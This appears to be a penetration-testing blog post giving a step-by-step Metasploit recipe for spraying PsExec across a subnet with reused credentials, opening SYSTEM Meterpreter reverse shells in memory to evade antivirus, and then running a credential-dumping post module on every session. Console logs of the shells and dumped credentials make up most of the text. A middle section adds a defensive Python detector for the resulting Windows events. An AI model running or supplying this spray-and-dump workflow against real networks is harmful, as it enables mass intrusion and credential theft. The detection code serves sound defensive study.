control – mass psexec sprayer

How to mass-PSExec using PowerShell, so there is no clean-up and the run is more likely to bypass AV, since the payload runs in memory.

1. PSExec Scanner Auxiliary Module from http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html; the GitHub script is at https://raw.githubusercontent.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb

2. Create a new MSF module SMB directory so you can add your own script:

mkdir -p ~/.msf4/modules/auxiliary/scanner/smb/
cd ~/.msf4/modules/auxiliary/scanner/smb/

3. Place a copy of psexec_scanner.rb into /root/.msf4/modules/auxiliary/scanner/smb/

4. This script uses psexec, which now defaults to the PowerShell target, so there is no need to add any payload options; simply add the below:

use auxiliary/scanner/smb/psexec_scanner.rb
set rhosts 192.168.56.0/24
set smbpass The_Password_or_Password_Hash
set smbuser The_Username
set threads 5
set lhost Your-IP-Address
set lport 4444
run

Then sit back and count the shells

msf auxiliary(psexec_scanner) run

[*] Using the username and password provided
[*] Starting exploit multi handler
[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.1: – 192.168.56.1:445 – TCP OPEN
[*] 192.168.56.1: – Trying The_Username:The_Password_or_Password_Hash
[*] Starting the payload handler…
[*] 192.168.56.1:445 – Connecting to the server…
[*] 192.168.56.1:445 – Authenticating to 192.168.56.1:445|WORKGROUP as user 'The_Username'…
[-] 192.168.56.1:445 – Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Scanned 26 of 256 hosts (10% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] 192.168.56.101: – 192.168.56.101:445 – TCP OPEN
[*] 192.168.56.101: – Trying The_Username:The_Password_or_Password_Hash
[*] 192.168.56.103: – 192.168.56.103:445 – TCP OPEN
[*] 192.168.56.103: – Trying The_Username:The_Password_or_Password_Hash
[*] 192.168.56.101:445 – Connecting to the server…
[*] 192.168.56.101:445 – Authenticating to 192.168.56.101:445|WORKGROUP as user 'The_Username'…
[*] 192.168.56.103:445 – Connecting to the server…
[*] 192.168.56.103:445 – Authenticating to 192.168.56.103:445|WORKGROUP as user 'The_Username'…
[*] 192.168.56.103:445 – Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.56.103:445 – PowerShell found
[*] 192.168.56.103:445 – Selecting PowerShell target
[*] 192.168.56.103:445 – Powershell command length: 2385
[*] 192.168.56.103:445 – Executing the payload…
[*] 192.168.56.103:445 – Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.103[\svcctl] …
[*] 192.168.56.103:445 – Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.103[\svcctl] …
[*] 192.168.56.103:445 – Obtaining a service manager handle…
[*] 192.168.56.103:445 – Creating the service…
[*] 192.168.56.101:445 – Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.56.101:445 – PowerShell found
[*] 192.168.56.101:445 – Selecting PowerShell target
[*] 192.168.56.101:445 – Powershell command length: 2393
[*] 192.168.56.101:445 – Executing the payload…
[*] 192.168.56.101:445 – Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.101[\svcctl] …
[*] 192.168.56.101:445 – Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.101[\svcctl] …
[*] 192.168.56.101:445 – Obtaining a service manager handle…
[*] 192.168.56.101:445 – Creating the service…
[+] 192.168.56.103:445 – Successfully created the service
[*] 192.168.56.103:445 – Starting the service…
[+] 192.168.56.103:445 – Service start timed out, OK if running a command or non-service executable…
[*] 192.168.56.103:445 – Removing the service…
[+] 192.168.56.103:445 – Successfully removed the sevice
[*] 192.168.56.103:445 – Closing service handle…
[+] 192.168.56.101:445 – Successfully created the service
[*] 192.168.56.101:445 – Starting the service…
[+] 192.168.56.101:445 – Service start timed out, OK if running a command or non-service executable…
[*] 192.168.56.101:445 – Removing the service…
[+] 192.168.56.101:445 – Successfully removed the sevice
[*] 192.168.56.101:445 – Closing service handle…

[*] Sending stage (957999 bytes) to 192.168.56.103

[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.103:49161) at 2016-09-29 13:09:37 +0100

[*] Sending stage (957999 bytes) to 192.168.56.101

[*] Meterpreter session 2 opened (192.168.56.105:4444 -> 192.168.56.101:49158) at 2016-09-29 13:09:42 +0100

[*] Scanned 107 of 256 hosts (41% complete)
[*] Scanned 131 of 256 hosts (51% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(Psexec_Mass_Scan) sessions

Active sessions
===============

Id  Type                   Information                     Connection
--  ----                   -----------                     ----------
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ IE11WIN7  192.168.56.105:4444 -> 192.168.56.103:49161 (192.168.56.103)
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ IE11WIN7  192.168.56.105:4444 -> 192.168.56.101:49158 (192.168.56.101)
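What the run above leaves on each target is what a defender can key on: every host first saw a network logon from one source address, and then a service whose image path launches powershell.exe with an encoded command (the "Creating the service" / "Starting the service" / "Removing the service" lines). The service is removed again and no binary is written, but the service installation itself is still recorded by Windows (System log event 7045), and the authentications show up as Security log 4624 logon type 3 (or 4625 on failure) across many hosts in a short window. The script below is an added example, not part of the original post and not code from the psexec_scanner module: it replays constructed event records (field names, hostnames, addresses, service names and the encoded-command placeholder are all made up for the example) and flags the encoded-PowerShell service install, the one-source-to-many-hosts logon pattern, and the pairing of the two on the same host. It assumes the events have already been normalised into dicts with the keys shown.

```python
"""Replay constructed Windows event records and flag the two artefacts a
PowerShell-based PsExec spray leaves on each target (added example, not from
the original post): a System 7045 service install that launches
powershell.exe with an encoded command, and one source address producing
network logons (Security 4624 logon type 3, or 4625 failures) on many hosts
within a short window."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, already normalised into dicts the way a SIEM
# might hold them. Hostnames, addresses, service names and timestamps are
# invented; the encoded-command blob is a placeholder, not a real payload.
PSH_SERVICE = ("%COMSPEC% /b /c start /b /min powershell.exe "
               "-nop -w hidden -e BASE64BLOB==")
SAMPLE_EVENTS = [
    {"ts": "2016-09-29T13:09:20", "host": "IE11WIN7-A", "id": 4625,
     "src": "192.168.56.105", "user": "The_Username"},
    {"ts": "2016-09-29T13:09:31", "host": "IE11WIN7-B", "id": 4624,
     "src": "192.168.56.105", "user": "The_Username", "logon_type": 3},
    {"ts": "2016-09-29T13:09:33", "host": "IE11WIN7-B", "id": 7045,
     "service": "xYzAbCd", "image_path": PSH_SERVICE},
    {"ts": "2016-09-29T13:09:36", "host": "IE11WIN7-C", "id": 4624,
     "src": "192.168.56.105", "user": "The_Username", "logon_type": 3},
    {"ts": "2016-09-29T13:09:38", "host": "IE11WIN7-C", "id": 7045,
     "service": "kLmNoPq", "image_path": PSH_SERVICE},
    # Benign noise: a normal service install and an ordinary admin logon.
    {"ts": "2016-09-29T13:10:02", "host": "FILESRV01", "id": 7045,
     "service": "Backup Agent", "image_path": r"C:\Program Files\Backup\agent.exe"},
    {"ts": "2016-09-29T14:30:00", "host": "IE11WIN7-A", "id": 4624,
     "src": "192.168.56.50", "user": "helpdesk", "logon_type": 3},
]

# powershell(.exe) followed somewhere on the same command line by one of the
# encoded-command switch spellings (-e, -ec, -enc, -encodedcommand).
ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE)


def encoded_powershell_services(events):
    """7045 records whose ImagePath runs PowerShell with an encoded command."""
    return [e for e in events
            if e["id"] == 7045 and ENCODED_PS.search(e.get("image_path", ""))]


def logon_sprays(events, min_hosts=3, window=timedelta(minutes=5)):
    """Sources whose network logons (4624 type 3) or failures (4625) reach at
    least `min_hosts` distinct hosts inside `window`; one finding per source."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625 or (e["id"] == 4624 and e.get("logon_type") == 3):
            by_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e["host"]))
    findings = []
    for src, hits in by_src.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):          # slide the window start
            hosts = {h for t, h in hits[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                findings.append({"src": src, "start": t0.isoformat(),
                                 "hosts": sorted(hosts)})
                break
    return findings


def service_after_logon(events, max_gap=timedelta(minutes=2)):
    """Pair each encoded-PowerShell 7045 with the most recent network logon on
    the same host within `max_gap`, so the finding carries the source address."""
    logons = [e for e in events if e["id"] == 4624 and e.get("logon_type") == 3]
    pairs = []
    for svc in encoded_powershell_services(events):
        t_svc = datetime.fromisoformat(svc["ts"])
        for lg in sorted(logons, key=lambda e: e["ts"], reverse=True):
            t_lg = datetime.fromisoformat(lg["ts"])
            if lg["host"] == svc["host"] and timedelta(0) <= t_svc - t_lg <= max_gap:
                pairs.append({"host": svc["host"], "service": svc["service"],
                              "src": lg["src"], "user": lg["user"]})
                break
    return pairs


def analyse(events):
    """Run all three checks and return the findings as one dict."""
    return {"encoded_powershell_services": encoded_powershell_services(events),
            "logon_sprays": logon_sprays(events),
            "service_after_logon": service_after_logon(events)}


if __name__ == "__main__":
    for name, hits in analyse(SAMPLE_EVENTS).items():
        print(name)
        for h in hits:
            print("  ", h)
```

On the constructed sample this reports the two encoded-PowerShell service installs on IE11WIN7-B and IE11WIN7-C, one spray source (192.168.56.105, three hosts in 16 seconds) and both installs paired with that source, while the backup agent install and the later helpdesk logon are left alone. The thresholds (three hosts in five minutes, service within two minutes of the logon) are starting points for tuning, not fixed values.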

-------------
Then, to run post-exploitation modules against all sessions at once:

1. Create a Ruby resource script, taken from https://k0st.wordpress.com/2015/07/10/running-commands-on-multiple-meterpreter-sessions/

2. Copy the below, paste it into a file and save it to a directory:

<ruby>
# Iterate over every open session, point the currently selected module at it
# and run the module as a background job (-j), pausing briefly between runs.
framework.sessions.each do |num, session|
  run_single("set SESSION #{num}")
  print_status("Running #{active_module.fullname} against session #{num}")
  run_single("run -j")
  sleep 1
end
</ruby>

3. Go into your chosen post module and run:

resource /root/Desktop/MSF/runall-jobs.rc

Using it with Mimikatz

use post/windows/gather/credentials/sso

msf post(sso) > resource /root/Desktop/MSF/runall-jobs.rc 

[*] Processing /root/Desktop/MSF/runall-jobs.rc for ERB directives.

[*] resource (/root/Desktop/MSF/runall-jobs.rc)> Ruby Code (180 bytes)

SESSION => 1

[*] Running post/windows/gather/credentials/sso against session 1
[*] Post module running as background job 
[*] Running module against IE11WIN7
SESSION => 2
[*] Running post/windows/gather/credentials/sso against session 2
[*] Post module running as background job
[*] Running module against IE11WIN7

Windows SSO Credentials
=======================

AuthID    Package  Domain    User          Password
------    -------  ------    ----          --------
0;100695  NTLM     IE11WIN7  The_Username  The_Password_or_Password_Hash
0;100695  NTLM     IE11WIN7  The_Username
0;101108  NTLM     IE11WIN7  The_Username  The_Password_or_Password_Hash
0;101108  NTLM     IE11WIN7  The_Username
msf post(sso) >

Windows SSO Credentials
=======================

AuthID   Package  Domain    User          Password
------   -------  ------    ----          --------
0;73188  NTLM     IE11WIN7  The_Username  The_Password_or_Password_Hash
0;73188  NTLM     IE11WIN7  The_Username
0;73226  NTLM     IE11WIN7  The_Username  The_Password_or_Password_Hash
0;73226  NTLM     IE11WIN7  The_Username